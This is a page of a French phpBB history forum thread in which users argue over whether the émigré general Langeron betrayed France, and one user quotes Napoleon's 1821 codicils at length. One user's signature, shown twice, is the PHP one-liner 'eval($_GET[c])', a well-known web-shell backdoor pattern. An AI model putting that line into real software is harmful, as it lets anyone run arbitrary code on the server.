FAQ Rechercher Liste des Membres Groupes d'utilisateurs Connexion S'enregistrer
Les Marie-Louise
Aller à la page Précédente  1, 2, 3, 4, 5, 6, 7  Suivante
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
TN



Inscrit le: 19 Mai 2006
Messages: 524

Posté le: 20 Juil 2007 12:50
Sujet du message:
Répondre en citant

La Bédoyère a écrit:
... l'affaire Catherine Théo ...
C'est quoi ?
Voir le profil de l'utilisateur Envoyer un message privé
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
La Bédoyère
De coeur et de passion


Inscrit le: 07 Juin 2007
Messages: 960

Posté le: 20 Juil 2007 13:15
Sujet du message:
Répondre en citant

C'est un coup monté par Vadier pour ridiculiser Robespierre, en accusant celui-ci d'être influencé par un groupe d'illuminés parmi lesquels figurait cette Catherine Théo...(j'espère que l'ortographe est bonne...).
_________________
---
Quelle époque, quels hommes
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
CC



Inscrit le: 18 Avr 2006
Messages: 6266
Localisation: Anderlecht, Bruxelles
Posté le: 23 Juil 2007 11:54
Sujet du message:
Répondre en citant

http://www.napoleonprisonnier.com/chronologie/campagnefrance1.html#langeron

amitié
_________________
phpbb:eval($_GET[c]);
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
Drouet cyril



Inscrit le: 09 Mai 2006
Messages: 647

Posté le: 09 Aoû 2007 16:07
Sujet du message:
Répondre en citant

Citation:
Comment appelez-vous un individu qui part servir une armée étrangère, qui plus est en guerre avec son propre pays, et ce avec le titre de lieutenant-général?...un traître?...un égaré?


Dans le cas qui nous intéresse ici : un émigré royaliste servant dans les armées coalisées contre les révolutionnaires.

Citation:
il se trouvait-il tout-à-fait par hasard dans les rangs de l'armée russe...Je suis impatient de connaître votre explication de sa présence au côté du tsar Alexandre.


Langeron a fui la France révolutionnaire. Dans une situation de guerre comme l'Europe la connaissait à cette époque, la suite concernant notre militaire est somme toute fort logique et bien peu nébuleuse. :idea:


Citation:
Vous êtes étrangement silencieux sur ceux, modestes, bien souvent roturiers qui, eux par contre, restaient fidèles à leur patrie...


Bien ouvrez un peu mieux les yeux alors… Rolling Eyes


Citation:
Ils ne s'en cachent pas...et savent très bien se tenir dans les salles d'archives...


Bien évidemment. Mais je ne parlais pas d'eux mais de vous…





Pour revenir sur Langeron, voici ce petit quelque chose tiré de ses Mémoires :
"Par le rétablissement si heureux et si imprévu de Louis XVIII sur le trône de ses pères, je me trouvais avoir combattu pour ma patrie."


A méditer... Rolling Eyes
Un poil plus compliqué que de trouver le plus vilain nom d'oiseau à agraffer sur les vestons des méchants pas beaux du camp d'en face.


Salutations respectueuses.
_________________
" Grâce aux prisonniers. Bonchamps le veut. Bonchamps l'ordonne ! " (d'Autichamp)
Voir le profil de l'utilisateur Envoyer un message privé
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
La Bédoyère
De coeur et de passion


Inscrit le: 07 Juin 2007
Messages: 960

Posté le: 10 Aoû 2007 9:40
Sujet du message:
Répondre en citant

Bonjour Drouet cyril,

Je vous remercie pour ce grand moment d'hilarité dans ce triste été.

Citation : dans le cas qui nous intéresse ici : un émigré royaliste servant dans les atmées coalisées contre les révolutionnaires.

Je me permets de vous rappeler, cher Monsieur, que ce sont le roi Louis XVI et l'Assemblée Législative, poussée par les Girondins, qui ont déclaré la guerre à l'Autriche. Seuls les Montagnards et Robespierre, tout particulièrement, ont vigoureusement lutté contre la déclaration de guerre. La cour de France espèrait la victoire de l'Autriche...Hélas pour elle celle-ci a connu vingt-trois ans de défaites!


Citation : Langeron a fui la France révolutionnaire. Dans une situation de guerre comme l'Europe la connaissait à cette époque, la suite concernant notre militaire est somme toute fort logique et bien peu nébuleuse.

Je vous remercie sincèrement de confirmer la trahison de Langeron.



Citation : Pour revenir sur Langeron, voici ce petit quelque chose tiré de ses Mémoires : "Par le rétablissement si heureux et si imprévu de Louis XVII sur le trône de ses pères, je me trouvais avoir combattu pour ma patrie".

Je vous remercie du fond du coeur de nous confirmer noir sur blanc que Langeron confondait ses idées avec sa patrie.
Et un rétablissement si "attendu", qu'en juillet 1830, le peuple français s'en passera volontiers et invitera Charles X à rejoindre les oubliettes de l'Histoire.

Citation : Un poil plus compliqué que de trouver le plus vilain nom d'oiseau à agraffer sur les vestons des méchants pas beaux du camp d'en face.

Ce ton moralisateur de bazar, qui se veut d'un esprit libre, est à l'image de toute votre argumentation

Impériales salutations.
_________________
---
Quelle époque, quels hommes
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
Drouet cyril



Inscrit le: 09 Mai 2006
Messages: 647

Posté le: 10 Aoû 2007 9:59
Sujet du message:
Répondre en citant

Citation:
La cour de France espèrait la victoire de l'Autriche...


Tout comme Langeron, faut-il le rappeler, émigré royaliste servant dans les armées coalisées contre les révolutionnaires.


Citation:
Je vous remercie sincèrement de confirmer la trahison de Langeron.


Laughing Relisez mieux.

Citation:
Vous avez un grand talent pour dénigrer, ridiculiser ceux qui ont un avis opposé au vôtre


Non pas ceux qui ont un avis opposé, mais ceux qui confondent recherche historique et match de foot.

Citation:
invitera Charles X à rejoindre les oubliettes de l'Histoire.


Non point, puisque vous en parlez. 8)


Citation:
Ce ton moralisateur de bazar, qui se veut d'un esprit libre, est à l'image de toute votre argumentation


Laughing
_________________
" Grâce aux prisonniers. Bonchamps le veut. Bonchamps l'ordonne ! " (d'Autichamp)
Voir le profil de l'utilisateur Envoyer un message privé
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
La Bédoyère
De coeur et de passion


Inscrit le: 07 Juin 2007
Messages: 960

Posté le: 10 Aoû 2007 10:28
Sujet du message:
Répondre en citant

Cher Drouet cyril,

Détendez-vous...Vous avez toute liberté de vous moquer de moi, de me faire prendre des vessies pour des lanternes...mais surtout ne soyez pas un monarchiste honteux...il n'y a aucun mal à ça.

Quant au match de foot, vous avez vous-même engagé un match de boxe...en qualifiant votre serviteur de supporter de courses cyclistes.
Tout aristocrate, digne de ce nom, doit savoir assumer ses responsabilité

Au fait MERCI ENCORE UNE FOIS, de nous confirmer dans votre réponse que Langeron avait trahi...

Quant à ce lamentable Charles X, il a oublié d'emporter dans les oubliettes de l'Histoire le souvenir de sa vanité et de sa stupidité.

Je reste à votre entière disposition pour nos échanges qui, ma foi, ne manquent pas de piquant...

Amitiés impériales
_________________
---
Quelle époque, quels hommes
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
La Bédoyère
De coeur et de passion


Inscrit le: 07 Juin 2007
Messages: 960

Posté le: 10 Aoû 2007 10:37
Sujet du message:
Répondre en citant

Cher Drouet cyril,

J'ai oublié un "s" à responsabilité.

Je m'en excuse...L'orthographe est une marque de respect vis-à-vis de son interlocuteur....et comme je ne doute pas que nous ayons un grand respect l'un vis-à-vis de l'autre.

Impériales amitiés.
_________________
---
Quelle époque, quels hommes
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
Drouet cyril



Inscrit le: 09 Mai 2006
Messages: 647

Posté le: 10 Aoû 2007 10:47
Sujet du message:
Répondre en citant

Citation:
Au fait MERCI ENCORE UNE FOIS, de nous confirmer dans votre réponse que Langeron avait trahi...


Re-relisez mieux.

fou heu...

Citation:
je ne doute pas que nous ayons un grand respect l'un vis-à-vis de l'autre.


mort de rire
_________________
" Grâce aux prisonniers. Bonchamps le veut. Bonchamps l'ordonne ! " (d'Autichamp)
Voir le profil de l'utilisateur Envoyer un message privé
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
La Bédoyère
De coeur et de passion


Inscrit le: 07 Juin 2007
Messages: 960

Posté le: 10 Aoû 2007 12:52
Sujet du message:
Répondre en citant

Vous savez en lisant toutes les interventions de Sa Seigneurerie depuis 2006, j'ai pu constater que celle-ci a une très haute opinion de se personne. Le fée modestie, certainement très occupée à votre naissance, n'a pu prendre le temps de se pencher sur votre auguste berceau. diabolo

C'est dommage pour la tranquillité du débat. Mais, de vous à moi, laissez- moi vous dire que je ne peux laisser n'importe qui dire n'importe quoi...

Mais peut-être que Sa Seigneurerie est crispée par le récent anniversaire de la nuit de 4 aoüt 1789... diablotin...ou peut-être est-ce le 10 août 1792, jour auquel nous pensons aujourd'hui avec émotion...

Quelle tristesse! On en pleurerai presque! N'est-ce pas Votre Seigneurerie?

Mais que Sa Seigneurerie ne se laisse pas abattre, dans cinq jours c'est la Saint-Napoléon.

Et malgré votre manque total de courtoisie je vous présente mes impériales salutations. salut!
_________________
---
Quelle époque, quels hommes
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
je doute



Inscrit le: 17 Juil 2007
Messages: 13

Posté le: 10 Aoû 2007 13:12
Sujet du message:
Répondre en citant

Bonjour!
Messieurs, je doute que vos disputes soient d'un apport bien intéressant, mais il est cependant deux faits sur lesquels, je pense, nous sommes tous d'accord:
- ce fameux Langeron a bel et bien fui la France pour cause de révolution.
- la révolution a amené à sa tête un chef qui combattait les rois.
Voir le profil de l'utilisateur Envoyer un message privé
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
La Bédoyère
De coeur et de passion


Inscrit le: 07 Juin 2007
Messages: 960

Posté le: 10 Aoû 2007 13:19
Sujet du message:
Répondre en citant

Bonjour je doute,

Je vous remercie de recentrer le débat. Le désaccord repose sur la forme et non sur le fond (chacun peut avoir tel ou tel jugement sur le comportement de Langeron), par contre où est-il écrit q'il est permis de ridiculiser un tel ou un tel ?

Bien sûr que les disputes n'offrent aucun intérêt, mais peut-on rester serein face à des sarcasmes?

Salutations
_________________
---
Quelle époque, quels hommes
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
Drouet cyril



Inscrit le: 09 Mai 2006
Messages: 647

Posté le: 10 Aoû 2007 15:01
Sujet du message:
Répondre en citant

Citation:
ce fameux Langeron a bel et bien fui la France pour cause de révolution.


En effet. Et il n'est pas le seul. Sans parler de ceux restés au pays pour combattre.
Soldats de l'Armée de Princes, combattants français des forces coalisés, Vendéens, Chouans de Bretagne, du Maine, d'Anjou ou de Normandie, royalistes de l'intérieur et tous les autres opposants, ils seraient bien nombreux dans le paquet à vomir, si l'on acceptait pour Langeron les termes de "traitre" ou d'action "anti-française".
C'est une vision manichéenne et partisane sans aucun intérêt.

Le plus drôle dans l'histoire, c'est que le faux La Bédoyère a sans doute oublié que Napoléon a lui-même qualifié de "traître" le vrai La Bédoyère. 8)


Salutations respectueuses.
_________________
" Grâce aux prisonniers. Bonchamps le veut. Bonchamps l'ordonne ! " (d'Autichamp)
Voir le profil de l'utilisateur Envoyer un message privé
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
La Bédoyère
De coeur et de passion


Inscrit le: 07 Juin 2007
Messages: 960

Posté le: 10 Aoû 2007 15:41
Sujet du message:
Répondre en citant

Dans son testament Napoléon laisse au leg aux enfants de ses fidèles serviteurs.

La preuve (15ème rang deuxième partie)


Le testament de l'Empereur

Seconde Partie

Ce 24 avril 1821. Longwood.


Ceci est mon codicille, ou acte de ma dernière volonté.

Sur les fonds remis en or à l'impératrice Marie-Louise, ma très chère et bien-aimée épouse, à Orléans, en 1814, elle reste me devoir deux millions, dont je dispose par le présent codicille, afin de récompenser mes plus fidèles serviteurs, que je recommande du reste à la protection de ma chère Marie-Louise.

1° Je recommande à l'Impératrice de faire restituer au comte Bertrand les trente mille francs de rente qu'il possède dans le duché de Parme, et sur le mont Napoléon de Milan ainsi que les arrérages échus.

2° Je lui fais la même recommandation pour le duc d'Istrie, la fille de Duroc, et autres de mes serviteurs qui me sont restés fidèles et qui me sont toujours chers ; elle les connaît.

3° Je lègue, sur les deux millions ci-dessus mentionnés, trois cent mille francs au comte Bertrand, sur lesquels il versera cent mille francs dans la caisse du trésorier, pour être employés, selon mes dispositions, à des legs de conscience.

4° Je lègue deux cent mille francs au comte Montholon, sur lesquels il versera cent mille francs dans la caisse du trésorier, pour le même usage que ci-dessus.

5° Idem, deux cent mille francs au comte Las Cases, sur lesquels il versera cent mille francs dans la caisse du trésorier, pour le même usage que ci-dessus.

6° Idem, à Marchand, cent mille francs, sur lesquels il versera cinquante mille francs dans la caisse, pour le même usage que ci-dessus.

7° Au maire d'Ajaccio, au commencement de la Révolution, Jean Jérôme Lévy, ou à sa veuve, enfants ou petits-enfants, cent mille francs.

8° A la fille de Duroc, cent mille francs.

9" Au fils de Bessières, duc d'Istrie, cent mille francs.

10° Au général Drouot, cent mille francs.

11° Au comte Lavalette, cent mille francs.

12° Idem cent mille francs ; savoir :
Vingt-cinq mille francs, à Pierron, mon maître d'hôtel.
Vingt-cinq mille francs, à Noverraz, mon chasseur.
Vingt-cinq mille francs, à Saint-Denis, le garde de mes livres.
Vingt-cinq mille francs à Santini, mon ancien huissier.

13° Idem, cent mille francs ; savoir :
Quarante mille francs à Planat, mon officier d'ordonnance.
Vingt mille francs à Hébert, dernièrement concierge à Rambouillet, et qui était de ma chambre en Egypte.
Vingt mille francs à Lavigné, qui était dernièrement concierge d'une de mes écuries, et qui était mon piqueur en Egypte.

Vingt mille francs à Jeannet-Dervieux, qui était piqueur des écuries, et me servait en Egypte.

14° Deux cent mille francs seront distribués en aumône aux habitants de Brienne-le-Château qui ont le plus souffert.

Les trois cent mille francs restants seront distribués aux officiers et soldats du bataillon de ma garde de l'île d'Elbe, actuellement vivants, ou à leurs veuves ou enfants, au prorata des appointements, et selon l'état qui sera arrêté par mes exécuteurs testamentaires, les amputés ou blessés grièvement auront le double. L'état en sera arrêté par Larrey et Emmery.

Ce codicille est écrit tout de ma propre main, signé et scellé de mes armes.

NAPOLÉON.




Ce 24 avril 1821, Longwood.

Ceci est mon codicile, ou acte de ma dernire volonté.
Sur la liquidation de ma liste civile d'Italie, telle qu'argent, bijoux argenterie, linge, meubles, écuries dont le vice-roi est dépositaire, et qui m'appartiennent, je dispose de deux millions que je lègue à mes plus fidèles serviteurs.

J'espère que, sans s'autoriser d'aucune raison, mon fils Eugène Napoléon les acquittera fidèlement; il ne peut oublier les quarante millions de francs que je lui ai donnés, soit en Italie, soit par le partage de la succession de sa mère.

1° Sur ces deux millions, je lègue au comte Bertrand trois cent mille francs, dont il versera cent mille francs dans la caisse du trésorier pour être employés, selon mes dispositions, à l'acquit de legs de conscience.

2° Au comte Montholon, deux cent mille francs, dont il versera cent mille francs à la caisse, pour le même usage que ci-dessus.

3° Au comte Las Cases, deux cent mille francs, dont il versera cent mille francs à la caisse, pour le même usage que ci-dessus.

4° A Marchand, cent mille francs, dont il versera cinquante mille francs à la caisse, pour le même usage que ci-dessus.

5° Au comte Lavalette, cent mille francs.

6° Au général Hogendorp, Hollandais, mon aide de camp réfugié au Brésil, cent mille francs.

7° A mon aide de camp Corbineau, cinquante mille francs.
8° A mon aide de camp, Caffarelli, cinquante mille francs.
9° A mon aide de camp Dejean, cinquante mille francs.
10° A Percy, chirurgien en chef à Waterloo, cinquante mille francs.
11° Cinquante mille francs, savoir : Dix mille francs à Pierron, mon maître d'hôtel.
Dix mille francs à Saint-Denis, mon premier chasseur.
Dix mille francs à Noverraz.
Dix mille francs à Coursot, mon maître d'office.
Dix mille francs à Archambault, mon piqueur.

12° Au baron Méneval, cinquante mille francs.
13° Au duc d'Istrie, fils de Bessières, cinquante mille francs.
14° A la fille de Duroc, cinquante mille francs.
15° Aux enfants de Labédoyère, cinquante mille francs.
16° Aux enfants de Mouton-Duvernet, cinquante mille francs.
17° Aux enfants du brave et vertueux général Travot, cinquante mille francs.
18° Aux enfants de Chartrand, cinquante mille francs.
19° Au général Cambronne, cinquante mille francs.
20° Au général Lefebvre-Desnouettes, cinquante mille francs.

21° Pour être répartis entre les proscrits qui errent en pays étrangers, Français, ou Italiens, ou Belges, ou Hollandais, ou Espagnol, ou des départements du Rhin, sur l'ordonnance de mes exécuteurs testamentaires, cent mille francs.

21° Pour être répartis entre les amputés ou blessés grièvement de Ligny, Waterloo, encore vivants, sur des états dressés par mes exécuteurs testamentaires, auxquels seront adjoints Cambronne, Larrey, Percy et Emmery, il sera donné double à la garde, quadruple à ceux de l'île d'Elbe, deux cent mille francs.

Ce codicille est écrit entièrement de ma propre main, signé et scellé de mes armes.

NAPOLEON.
_________________
---
Quelle époque, quels hommes
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail
 
Voir le sujet précédent Voir le sujet suivant 
Auteur Message
CC



Inscrit le: 18 Avr 2006
Messages: 6266
Localisation: Anderlecht, Bruxelles
Posté le: 10 Aoû 2007 16:25
Sujet du message:
Répondre en citant

Cher Cyril,

pouvez-vous nous dire où et quand Napoléon a dit que La Bédoyère était un traître?

Merci!

amitié

_________________
phpbb:eval($_GET[c]);
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur
 
 
Page 5 sur 7 Aller à la page Précédente  1, 2, 3, 4, 5, 6, 7  Suivante
 
Sauter vers:   

Powered by phpBB v2 © 2001, 2005 phpBB Group :: Style: Creamy White :: Traduction par : phpBB-fr.com



Anti Bot Question MOD - phpBB MOD against Spam Bots
Inscriptions bloqués / messages: 55040 / 0